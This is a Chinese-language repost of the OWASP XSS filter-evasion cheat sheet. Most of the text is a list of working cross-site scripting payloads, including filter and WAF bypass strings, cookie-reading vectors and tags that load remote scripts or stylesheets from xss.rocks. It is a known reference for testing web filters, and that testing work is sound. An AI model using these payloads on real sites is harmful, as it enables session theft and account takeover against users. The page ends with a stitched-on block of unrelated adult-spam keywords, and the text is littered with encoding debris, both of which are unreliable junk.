2.47.??? & JavaScript包含

<BR SIZE="&{alert('XSS')}">?

?

?

?

?

2.48.??? 樣式表

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">?

?

?

?

?

2.49.??? 遠(yuǎn)程樣式表

?

?

?

(利用像遠(yuǎn)程樣式表一樣簡(jiǎn)單的形式,你可以將XSS攻擊代碼包含在可使用內(nèi)置表達(dá)式進(jìn)行重定義的樣式參數(shù)里。)這只在IE和使用IE渲染模式Netscape8.1+。注意這里沒(méi)有任何元素在頁(yè)面中表明這頁(yè)面包含了JavaScript。提示:這些遠(yuǎn)程樣式表都使用了body標(biāo)簽,所以必須在頁(yè)面中有除了攻擊向量以外的內(nèi)容存在時(shí)才會(huì)生效, 也就是如果是空白頁(yè)的話你必須在頁(yè)面添加一個(gè)字母來(lái)讓攻擊代碼生效:

<LINK REL="stylesheet" HREF="http://xss.rocks/xss.css">?

?

?

2.50.??? 遠(yuǎn)程樣式表2

?

?

這個(gè)和上面一樣有效,不過(guò)使用了<STYLE>標(biāo)簽替代<LINK>標(biāo)簽. 這個(gè)細(xì)微的變化曾經(jīng)用來(lái)攻擊谷歌桌面。另一方面,如果在攻擊向量后有HTML標(biāo)簽閉合攻擊向量,你可以移除末尾的</STYLE>標(biāo)簽。在進(jìn)行跨站腳本攻擊時(shí),如不能同時(shí)使用等號(hào)或斜杠,這是非常有用的,這種情況在現(xiàn)實(shí)世界里不止一次發(fā)生了:

<STYLE>@import'http://xss.rocks/xss.css';</STYLE>?

?

?

2.51.??? 遠(yuǎn)程樣式表3

?

?

這種方式僅在Opera 8.0(9.x不可以)中有效,但方法比較有創(chuàng)意. 根據(jù)RFC2616,設(shè)置一個(gè)Link頭部不是HTTP1.1規(guī)范的一部分,但一些瀏覽器仍然允許這樣做 (例如Firefox和 ?Opera). 這里的技巧是設(shè)置一個(gè)頭部(和普通頭部并沒(méi)有什么區(qū)別,只是設(shè)置Link: <http://xss.rocks/xss.css>; REL=stylesheet)并且在遠(yuǎn)程樣式表中包含使用了JavaScript的跨站腳本攻擊向量,這一點(diǎn)是FireFox不支持的:

<META HTTP-EQUIV="Link" Content="<http://xss.rocks/xss.css>; REL=stylesheet">?

?

?

2.52.??? 遠(yuǎn)程樣式表4

?

?

這僅能在Gecko渲染引擎下有效并且需要在父頁(yè)面綁定一個(gè)XML文件。具有諷刺意味的是 Netscape認(rèn)為Gecko更安全 ,所以對(duì)絕大多數(shù)網(wǎng)站來(lái)說(shuō)會(huì)受到漏洞影響:

<STYLE>BODY{-moz-binding:url("http://xss.rocks/xssmoz.xml#xss")}</STYLE>?

?

?

2.53.??? 含有分隔JavaScript的STYLE標(biāo)簽

?

?

這個(gè)XSS會(huì)在IE中造成無(wú)限循環(huán):

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>?

?

?

2.54.??? STYLE屬性中使用注釋分隔表達(dá)式

?

?

由Roman Ivanov創(chuàng)建

<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">?

?

?

2.55.??? 含表達(dá)式的IMG STYLE

?

?

這是一個(gè)將上面XSS攻擊向量混合的方法,但確實(shí)展示了STYLE標(biāo)簽可以用相當(dāng)復(fù)雜的方式分隔,和上面一樣,也會(huì)讓IE進(jìn)入死循環(huán):

exp/*<A STYLE='no\xss:noxss("*//*");

xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

?

?

2.56.??? STYLE標(biāo)簽(僅舊版本Netscape可用)

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>?

?

?

?

?

2.57.??? 使用背景圖像的STYLE標(biāo)簽

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>?

?

?

?

?

2.58.??? 使用背景的STYLE標(biāo)簽

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>?

?

?

?

?

2.59.??? 含STYLE屬性的HTML任意標(biāo)簽

?

?

IE6.0和IE渲染引擎模式下的Netscape 8.1+并不關(guān)心你建立的HTML標(biāo)簽是否存在,只要是由尖括號(hào)和字母開(kāi)始的即可:

<XSS STYLE="behavior: url(xss.htc);">?

?

?

2.60.??? 本地htc文件

?

?

這和上面兩個(gè)跨站腳本攻擊向量有些不同,因?yàn)樗褂昧艘粋€(gè)必須和XSS攻擊向量在相同服務(wù)器上的.htc文件。這個(gè)示例文件通過(guò)下載JavaScript并將其作為style屬性的一部分運(yùn)行來(lái)進(jìn)行攻擊:

<XSS STYLE="behavior: url(xss.htc);">?

?

?

2.61.??? US-ASCII編碼

?

?

US-ASCII編碼(由Kurt Huwig發(fā)現(xiàn))。它使用了畸形的7位ASCII編碼來(lái)代替8位。這個(gè)XSS攻擊向量可以繞過(guò)大多數(shù)內(nèi)容過(guò)濾器,但是只在主機(jī)使用US-ASCII編碼傳輸數(shù)據(jù)時(shí)有效,或者可以自己設(shè)置編碼格式。相對(duì)繞過(guò)服務(wù)器端過(guò)濾,這在繞過(guò)WAF跨站腳本過(guò)濾時(shí)候更有效。Apache Tomcat是目前唯一已知使用US-ASCII編碼傳輸?shù)?#xff1a;

?script?alert(¢XSS¢)?/script??

?

?

2.62.??? META

?

?

關(guān)于meta刷新比較奇怪的是它并不會(huì)在頭部中發(fā)送一個(gè)referrer-所以它通常用于不需要referrer的時(shí)候:

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">?

?

?

2.62.1?使用數(shù)據(jù)的META

?

?

URL scheme指令。這個(gè)非常有用因?yàn)樗⒉话魏慰梢?jiàn)的SCRIPT單詞或JavaScript指令,因?yàn)樗褂昧薭ase64編碼.請(qǐng)查看RFC 2397尋找更多細(xì)節(jié)。你同樣可以使用具有Base64編碼功能的XSS工具來(lái)編碼HTML或JavaScript:

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">?

?

?

2.62.2?含有額外URL參數(shù)的META

?

?

如果目標(biāo)站點(diǎn)嘗試檢查URL是否包含"http://",你可以用以下技術(shù)規(guī)避它(由Moritz Naumann提交):

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">?

?

?

2.63.??? IFRAME

?

?

如果允許Iframe那就會(huì)有很多XSS問(wèn)題:

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>?

?

?

2.64.??? 基于事件IFRAME

?

?

Iframes和大多數(shù)其他元素可以使用下列事件(由David Cross提交):

<IFRAME SRC=# οnmοuseοver="alert(document.cookie)"></IFRAME>?

?

?

2.65.??? FRAME

?

?

Frames和iframe一樣有很多XSS問(wèn)題:

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>?

?

?

2.66.??? TABLE

<TABLE BACKGROUND="javascript:alert('XSS')">?

?

2.66.1. TD

?

?

和上面一樣,TD也可以通過(guò)BACKGROUND來(lái)包含JavaScriptXSS攻擊向量:

<TABLE><TD BACKGROUND="javascript:alert('XSS')">?

?

?

2.67.??? DIV

?

?

2.67.1. DIV背景圖像

<DIV STYLE="background-image: url(javascript:alert('XSS'))">?

?

?

2.67.2. 含有Unicode XSS利用代碼的DIV背景圖像

?

?

這進(jìn)行了一些修改來(lái)混淆URL參數(shù)。原始的漏洞是由RenaudLifchitz在Hotmail發(fā)現(xiàn)的:

<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">?

?

?

2.67.3. 含有額外字符的DIV背景圖像

?

?

Rnaske進(jìn)行了一個(gè)快速的XSS模糊測(cè)試來(lái)發(fā)現(xiàn)IE和安全模式下的Netscape 8.1中任何可以在左括號(hào)和JavaScript指令間加入的額外字符。這都是十進(jìn)制的但是你也可以使用十六進(jìn)制來(lái)填充(以下字符可用:1-32, 34, 39, 160, 8192-8.13, 12288, 65279):

<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">?

?

?

2.67.4. DIV表達(dá)式

?

?

一個(gè)非常有效的對(duì)抗現(xiàn)實(shí)中的跨站腳本過(guò)濾器的變體是在冒號(hào)和"expression"之間添加一個(gè)換行:

<DIV STYLE="width: expression(alert('XSS'));">?

2.68. ? ?html 條件選擇注釋塊

?

?

只能在IE5.0及更高版本和IE渲染引擎模式下的Netscape 8.1生效。一些網(wǎng)站認(rèn)為在注釋中的任何內(nèi)容都是安全的并且認(rèn)為沒(méi)有必要移除,這就允許我們添加跨站腳本攻擊向量。系統(tǒng)會(huì)在一些內(nèi)容周圍嘗試添加注釋標(biāo)簽以便安全的渲染它們。如我們所見(jiàn),這有時(shí)并不起作用:

<!--[if gte IE 4]>

?<SCRIPT>alert('XSS');</SCRIPT>

?<![endif]-->

?

?

2.69.??? BASE標(biāo)簽

?

?

在IE和安全模式下的Netscape 8.1有效。你需要使用//來(lái)注釋下個(gè)字符,這樣你就不會(huì)造成JavaScript錯(cuò)誤并且你的XSS標(biāo)簽可以被渲染。同樣,這需要當(dāng)前網(wǎng)站使用相對(duì)路徑例如"images/image.jpg"來(lái)放置圖像而不是絕對(duì)路徑。如果路徑以一個(gè)斜杠開(kāi)頭例如"/images/image.jpg"你可以從攻擊向量中移除一個(gè)斜杠(只有在兩個(gè)斜杠時(shí)注釋才會(huì)生效):

<BASE HREF="javascript:alert('XSS');//">?

?

?

2.70.??? OBJECT標(biāo)簽

?

?

如果允許使用OBJECT,你可以插入一個(gè)病毒攻擊載荷來(lái)感染用戶,類似于APPLET標(biāo)簽。鏈接文件實(shí)際是含有你XSS攻擊代碼的HTML文件:

<OBJECT TYPE="text/x-scriptlet" DATA="http://xss.rocks/scriptlet.html"></OBJECT>?

?

?

2.71.??? 使用EMBED標(biāo)簽加載含有XSS的FLASH文件

?

?

如果你添加了屬性allowScriptAccess="never"以及allownetworking="internal"則可以減小風(fēng)險(xiǎn)(感謝Jonathan Vanasco提供的信息):

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>?

?

?

2.72.??? 使用EMBED SVG包含攻擊向量

?

?

該示例只在FireFox下有效,但是比上面的攻擊向量在FireFox下好,因?yàn)椴恍枰脩舭惭b或啟用FLASH。感謝nEUrOO提供:

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>?

?

?

2.73.??? 在FLASH中使用ActionScript混淆XSS攻擊向量

a="get";

b="URL(\"";

c="javascript:";

d="alert('XSS');\")";

eval(a+b+c+d);

?

?

?

?

2.74.??? CDATA混淆的XML數(shù)據(jù)島

?

?

這個(gè)XSS攻擊只在IE和使用IE渲染模式的Netscape 8.1下有效-攻擊向量由Sec Consult在審計(jì)Yahoo時(shí)發(fā)現(xiàn)

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

?

?

2.75.??? 使用XML數(shù)據(jù)島生成含內(nèi)嵌JavaScript的本地XML文件

?

?

這和上面是一樣的但是將來(lái)源替換為了包含跨站腳本攻擊向量的本地XML文件(必須在同一服務(wù)器上):

<XML SRC="xsstest.xml" ID=I></XML>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

?

?

2.76.??? XML中使用HTML+TIME

?

?

這是Grey Magic攻擊Hotmail和Yahoo的方法。這只在IE和IE渲染模式下的Netscape8.1有效并且記得需要在HTML域的BODY標(biāo)簽中間才有效:

<HTML><BODY>?

<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">

<?import namespace="t" implementation="#default#time2">

<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">

</BODY></HTML>

?

?

2.77.??? 使用一些字符繞過(guò)".js"過(guò)濾

?

?

你可以將你的JavaScript文件重命名為圖像來(lái)作為XSS攻擊向量:

<SCRIPT SRC="http://xss.rocks/xss.jpg"></SCRIPT>?

?

?

2.78.??? SSI(服務(wù)端腳本包含)

?

?

這需要在服務(wù)器端允許SSI來(lái)使用XSS攻擊向量。似乎不用提示這點(diǎn),因?yàn)槿绻憧梢栽诜?wù)器端執(zhí)行指令那一定是有更嚴(yán)重的問(wèn)題存在:

<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://xss.rocks/xss.js></SCRIPT>'"-->?

?

?

2.79.??? PHP

?

?

需要服務(wù)器端安裝了PHP來(lái)使用XSS攻擊向量。同樣,如果你可以遠(yuǎn)程運(yùn)行任意腳本,那會(huì)有更加嚴(yán)重的問(wèn)題:

<? echo('<SCR)';

echo('IPT>alert("XSS")</SCRIPT>'); ?>

?

?

2.80.??? 嵌入命令的IMAGE

?

?

當(dāng)頁(yè)面受密碼保護(hù)并且這個(gè)密碼保護(hù)同樣適用于相同域的不同頁(yè)面時(shí)有效,這可以用來(lái)進(jìn)行刪除用戶,增加用戶(如果訪問(wèn)頁(yè)面的是管理員的話),將密碼發(fā)送到任意地方等等。。。這是一個(gè)較少使用當(dāng)時(shí)更有價(jià)值的XSS攻擊向量:

<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">?

2.80.1. 嵌入命令的IMAGE II

?

?

這更加可怕因?yàn)檫@不包含任何可疑標(biāo)識(shí),除了它不在你自己的域名上。這個(gè)攻擊向量使用一個(gè)302或304(其他的也有效)來(lái)重定向圖片到指定命令。所以一個(gè)普通的<IMG SRC="httx://badguy.com/a.jpg">對(duì)于訪問(wèn)圖片鏈接的用戶來(lái)說(shuō)也有可能是一個(gè)攻擊向量。下面是利用.htaccess(Apache)配置文件來(lái)實(shí)現(xiàn)攻擊向量。(感謝Timo提供這部分。):

Redirect 302 /a.jpg?http://victimsite.com/admin.asp&deleteuser

?

?

2.81.??? Cookie篡改

?

?

盡管公認(rèn)不太實(shí)用,但是還是可以發(fā)現(xiàn)一些允許使用META標(biāo)簽的情況下可用它來(lái)覆寫(xiě)cookie。另外的例子是當(dāng)用戶訪問(wèn)網(wǎng)站頁(yè)面時(shí),一些網(wǎng)站讀取并顯示存儲(chǔ)在cookie中的用戶名,而不是數(shù)據(jù)庫(kù)中。當(dāng)這兩種場(chǎng)景結(jié)合時(shí),你可以修改受害者的cookie以便將JavaScript注入到其頁(yè)面中(你可以使用這個(gè)讓用戶登出或改變他們的用戶狀態(tài),甚至可以讓他們以你的賬戶登錄):

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">?

?

?

2.82.??? UTF-7編碼

?

?

如果存在XSS的頁(yè)面沒(méi)有提供頁(yè)面編碼頭部,或者使用了任何設(shè)置為使用UTF-7編碼的瀏覽器,就可以使用下列方式進(jìn)行攻擊(感謝Roman Ivanov提供)。這在任何不改變編碼類型的現(xiàn)代瀏覽器上是無(wú)效的,這也是為什么標(biāo)記為完全不支持的原因。Watchfire在Google的自定義404腳本中發(fā)現(xiàn)這個(gè)問(wèn)題:

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-?

?

?

2.83.??? 利用HTML引號(hào)包含的XSS

?

?

這在IE中測(cè)試通過(guò),但還得視情況而定。它是為了繞過(guò)那些允許"<SCRIPT>"但是不允許"<SCRIPT SRC..."形式的正則過(guò)濾即"/<script[^>]+src/i":

<SCRIPT a=">" SRC="httx://xss.rocks/xss.js"></SCRIPT>?

?

?

這是為了繞過(guò)那些允許"<SCRIPT>"但是不允許"<SCRIPTSRC..."形式的正則過(guò)濾即" /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i"(這很重要,因?yàn)樵趯?shí)際環(huán)境中出現(xiàn)過(guò)這種正則過(guò)濾):

<SCRIPT =">" SRC="httx://xss.rocks/xss.js"></SCRIPT>?

?

?

另一個(gè)繞過(guò)此正則過(guò)濾" /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i"的XSS:

<SCRIPT a=">" '' SRC="httx://xss.rocks/xss.js"></SCRIPT>?

?

?

又一個(gè)繞過(guò)正則過(guò)濾" /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i"的XSS。盡管不想提及防御方法,但如果你想允許<SCRIPT>標(biāo)簽但不加載遠(yuǎn)程腳本,針對(duì)這種XSS只能使用狀態(tài)機(jī)去防御(當(dāng)然如果允許<SCRIPT>標(biāo)簽的話,還有其他方法繞過(guò)):

<SCRIPT "a='>'" SRC="httx://xss.rocks/xss.js"></SCRIPT>?

?

?

最后一個(gè)繞過(guò)此正則過(guò)濾" /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i"的XSS,使用了重音符(在FireFox下無(wú)效):

<SCRIPT a=`>` SRC="httx://xss.rocks/xss.js"></SCRIPT>?

?

?

這是一個(gè)XSS樣例,用來(lái)繞過(guò)那些不會(huì)檢查引號(hào)配對(duì),而是發(fā)現(xiàn)任何引號(hào)就立即結(jié)束參數(shù)字符串的正則表達(dá)式:

<SCRIPT a=">'>" SRC="httx://xss.rocks/xss.js"></SCRIPT>?

?

?

這個(gè)XSS很讓人擔(dān)心,因?yàn)槿绻贿^(guò)濾所有活動(dòng)內(nèi)容幾乎不可能防止此攻擊:

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="httx://xss.rocks/xss.js"></SCRIPT>?

?

?

2.84.??? URL字符繞過(guò)

?

?

假定"http://www.google.com/"是不被允許的:

?

?

2.84.1. IP代替域名

<A HREF="http://66.102.7.147/">XSS</A>?

?

?

?

?

2.84.2. URL編碼

<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>?

?

?

?

?

2.84.3. 雙字節(jié)編碼

?

?

(注意:還有另一種雙字節(jié)編碼):

<A HREF="http://1113982867/">XSS</A>?

?

?

2.84.4. 十六進(jìn)制編碼

?

?

每個(gè)數(shù)字的允許的范圍大概是240位字符,就如你在第二位上看到的,并且由于十六進(jìn)制是在0到F之間,所以開(kāi)頭的0可以省略:

<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>?

?

?

2.84.5. 八進(jìn)制編碼

?

?

又一次允許填充,盡管你必須保證每類在4位字符以上-例如A類,B類等等:

<A HREF="http://0102.0146.0007.00000223/">XSS</A>

?

?

2.84.6. 混合編碼

?

?

讓我們混合基本編碼并在其中插入一些TAB和換行,雖然不知道瀏覽器為什么允許這樣做。TAB和換行只有被引號(hào)包含時(shí)才有效:

<A HREF="h

tt p://6 6.000146.0x7.147/">XSS</A>

?

?

2.84.7. 協(xié)議解析繞過(guò)

?

?

(// 替代http://可以節(jié)約很多字節(jié)).當(dāng)輸入空間有限時(shí)很有用(少兩個(gè)字符可能解決大問(wèn)題) 而且可以輕松繞過(guò)類似"(ht|f)tp(s)?://"的正則過(guò)濾(感謝Ozh提供這部分).你也可以將"//"換成"\\"。你需要保證斜杠在正確的位置,否則可能被當(dāng)成相對(duì)路徑URL:

<A HREF="//www.google.com/">XSS</A>

?

?

2.84.8. Google的"feeling lucky"功能1

?

?

Firefox使用Google的"feeling lucky"功能根據(jù)用戶輸入的任何關(guān)鍵詞來(lái)將用戶重定向。如果你存在漏洞的頁(yè)面在某些隨機(jī)關(guān)鍵詞上搜索引擎排名是第一的,你就可以利用這一特性來(lái)攻擊FireFox用戶。這使用了Firefox的"keyword:"協(xié)議。你可以像下面一樣使用多個(gè)關(guān)鍵詞"keyword:XSS+RSnake"。這在Firefox2.0后不再有效.

<A HREF="//google">XSS</A>

?

?

2.84.9. Google的"feeling lucky"功能2

?

?

這使用了一個(gè)僅在FireFox上有效的小技巧,因?yàn)樗鼘?shí)現(xiàn)了"feelinglucky"功能。不像下面一個(gè)例子,這個(gè)在Opera上無(wú)效因?yàn)镺pera會(huì)認(rèn)為只是一個(gè)老式的HTTP基礎(chǔ)認(rèn)證釣魚(yú)攻擊,但它并不是。它只是一個(gè)畸形的URL。如果你點(diǎn)擊了對(duì)話框的確定,它就可以生效。但是在Opera上會(huì)是一個(gè)錯(cuò)誤對(duì)話框,所以認(rèn)為其不被Opera所支持,同樣在Firefox2.0后不再有效。

<A HREF="http://ha.ckers.org@google">XSS</A>

?

?

2.84.10.??????Google的"feeling lucky"功能3

?

?

這是一個(gè)畸形的URL只在FireFox和Opera下有效,因?yàn)樗鼈儗?shí)現(xiàn)了"feeling lucky"功能。像上面的例子一樣,它要求你的攻擊頁(yè)面在Google上特定關(guān)鍵詞排名第一(在這個(gè)示例里關(guān)鍵詞是"google")

<A HREF="http://google:ha.ckers.org">XSS</A>

?

?

2.84.11.??????移除別名

?

?

當(dāng)結(jié)合上面的URL,移除"www."會(huì)節(jié)約4個(gè)字節(jié),總共為正確設(shè)置的服務(wù)器節(jié)省9字節(jié):

<A HREF="http://google.com/">XSS</A>

?

?

2.84.12.??????絕對(duì)DNS名稱后額外的點(diǎn)

<A HREF="http://www.google.com./">XSS</A>

?

?

?

?

2.84.13.??????JavaScriptlink location

<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

?

?

?

?

2.84.14.??????內(nèi)容替換作為攻擊向量

?

?

假設(shè)"http://www.google.com/"會(huì)自動(dòng)替換為空。我實(shí)際使用過(guò)類似的攻擊向量即通過(guò)使用轉(zhuǎn)換過(guò)濾器本身(示例如下)來(lái)幫助構(gòu)建攻擊向量以對(duì)抗現(xiàn)實(shí)世界的XSS過(guò)濾器:

<A HREF="http://www.google.com/ogle.com/">XSS</A>

2.85. ? ?字符轉(zhuǎn)義表

?

?

下面是HTML和JavaScript中字符“<”的所有可能組合。其中大部分不會(huì)被渲染出來(lái),但其中許多可以在某些情況下呈現(xiàn)出來(lái)。:

<

%3C

&lt

&lt;

&LT

&LT;

&#60

&#060

&#0060

&#00060

&#000060

&#0000060

&#60;

&#060;

&#0060;

&#00060;

&#000060;

&#0000060;

&#x3c

&#x03c

&#x003c

&#x0003c

&#x00003c

&#x000003c

&#x3c;

&#x03c;

&#x003c;

&#x0003c;

&#x00003c;

&#x000003c;

&#X3c

&#X03c

&#X003c

&#X0003c

&#X00003c

&#X000003c

&#X3c;

&#X03c;

&#X003c;

&#X0003c;

&#X00003c;

&#X000003c;

&#x3C

&#x03C

&#x003C

&#x0003C

&#x00003C

&#x000003C

&#x3C;

&#x03C;

&#x003C;

&#x0003C;

&#x00003C;

&#x000003C;

&#X3C

&#X03C

&#X003C

&#X0003C

&#X00003C

&#X000003C

&#X3C;

&#X03C;

&#X003C;

&#X0003C;

&#X00003C;

&#X000003C;

\x3c

\x3C

\u003c

\u003C

?

3.繞過(guò)WAF的方法

?

?

通用問(wèn)題

?

?

? 存儲(chǔ)型XSS

?

?

如果攻擊者已經(jīng)讓XSS繞過(guò)過(guò)濾器,WAF無(wú)法阻止攻擊透過(guò)。

?

?

?基于JavaScript的反射型XSS

示例: <script> ... setTimeout(\"writetitle()\",$_GET[xss]) ... </script>

利用: /?xss=500); alert(document.cookie);//

?

?

?

?基于DOM的XSS

示例: <script> ... eval($_GET[xss]); ... </script>

利用: /?xss=document.cookie

?

?

?

通過(guò)請(qǐng)求重定向構(gòu)造XSS

?

?

?存在漏洞代碼:

...

?header('Location: '.$_GET['param']);

...

?

?

同樣包括:

...

?header('Refresh: 0; URL='.$_GET['param']);

...

?

?

?這種請(qǐng)求不會(huì)繞過(guò)WAF:

/?param=javascript:alert(document.cookie)

?

?

?這種請(qǐng)求可以繞過(guò)WAF并且XSS攻擊可以在某些瀏覽器執(zhí)行:

/?param=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

?

?

繞過(guò)WAF可用字符串.

<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">

<Video> <source onerror = "javascript: alert (XSS)">

<Input value = "XSS" type = text>

<applet code="javascript:confirm(document.cookie);">

<isindex x="javascript:" οnmοuseοver="alert(XSS)">

"></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

"><img src="x:x" οnerrοr="alert(XSS)">

"><iframe src="javascript:alert(XSS)">

<object data="javascript:alert(XSS)">

<isindex type=image src=1 οnerrοr=alert(XSS)>

<img src=x:alert(alt) οnerrοr=eval(src) alt=0>

<img? src="x:gif" οnerrοr="window['al\u0065rt'](0)"></img>

<iframe/src="data:text/html,<svg οnlοad=alert(1)>">

<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>

<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script

<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">

<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>

<form><a href="javascript:\u0061lert(1)">X

</script><img/*%00/src="worksinchrome&colon;prompt(1)"/%00*/οnerrοr='eval(src)'>

<style>//*{x:expression(alert(/xss/))}//<style></style>?

On Mouse Over?

<img src="/" =_=" title="οnerrοr='prompt(1)'">

<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe

<script x> alert(1) </script 1=2

<form><button formaction=javascript&colon;alert(1)>CLICKME

<input/οnmοuseοver="javaSCRIPT&colon;confirm&lpar;1&rpar;"

<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>

?

?

?

3.1.? Alert混淆以繞過(guò)過(guò)濾器

(alert)(1)

a=alert,a(1)

[1].find(alert)

top[“al”+”ert”](1)

top[/al/.source+/ert/.source](1)

al\u0065rt(1)

top[‘a(chǎn)l\145rt’](1)

top[‘a(chǎn)l\x65rt’](1)

top[8680439..toString(30)](1)

?

4.作者和主要編輯

?

?

Robert "RSnake" Hansen

?

5.貢獻(xiàn)者

?

?

Adam Lange

?

?

Mishra Dhiraj

?

?

版權(quán)與許可

?

?

版權(quán)所有:OWASP基金會(huì)?

?

本文檔基于 Creative Commons Attribution ShareAlike3.0 license 發(fā)布。任何重用或發(fā)行,都必須向他人明確該文檔的許可條款。?http://creativecommons.org/licenses/by-sa/3.0/

*原文地址:owasp.org,walletong@ansion編譯,轉(zhuǎn)載自FreeBuf.COM

總結(jié)

以上是生活随笔為你收集整理的XSS绕过,XSS过滤速查,XSS绕过姿势的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。

久久久久se色偷偷亚洲精品av | 久久综合激激的五月天 | 丰满少妇熟乱xxxxx视频 | 久久国产精品偷任你爽任你 | 精品熟女少妇av免费观看 | 亚洲人成人无码网www国产 | 国产黑色丝袜在线播放 | 国产性生交xxxxx无码 | 日本精品人妻无码免费大全 | 国产精品a成v人在线播放 | 久久国产精品精品国产色婷婷 | 67194成是人免费无码 | 国产一区二区三区精品视频 | 国产极品美女高潮无套在线观看 | 国产做国产爱免费视频 | 人人超人人超碰超国产 | 双乳奶水饱满少妇呻吟 | 亚无码乱人伦一区二区 | 国产一区二区三区日韩精品 | 国产精品无码一区二区三区不卡 | 99在线 | 亚洲 | 一二三四在线观看免费视频 | 在线播放免费人成毛片乱码 | 装睡被陌生人摸出水好爽 | 亚洲最大成人网站 | 一本久道久久综合婷婷五月 | 亚洲日韩av一区二区三区四区 | 日韩在线不卡免费视频一区 | 国产精品资源一区二区 | 无遮挡啪啪摇乳动态图 | 日日橹狠狠爱欧美视频 | av在线亚洲欧洲日产一区二区 | 国产精品怡红院永久免费 | 水蜜桃亚洲一二三四在线 | 日韩人妻系列无码专区 | 国产在线一区二区三区四区五区 | 亚洲va欧美va天堂v国产综合 | 免费网站看v片在线18禁无码 | 又色又爽又黄的美女裸体网站 | 国产精品国产三级国产专播 | 国产成人午夜福利在线播放 | 欧美乱妇无乱码大黄a片 | 99久久久无码国产aaa精品 | 网友自拍区视频精品 | 国内综合精品午夜久久资源 | 天堂久久天堂av色综合 | 日韩欧美中文字幕公布 | 国产精品对白交换视频 | 国产精品久久久 | 无码帝国www无码专区色综合 | 人人妻人人澡人人爽欧美一区九九 | 国产黑色丝袜在线播放 | aⅴ亚洲 日韩 色 图网站 播放 | 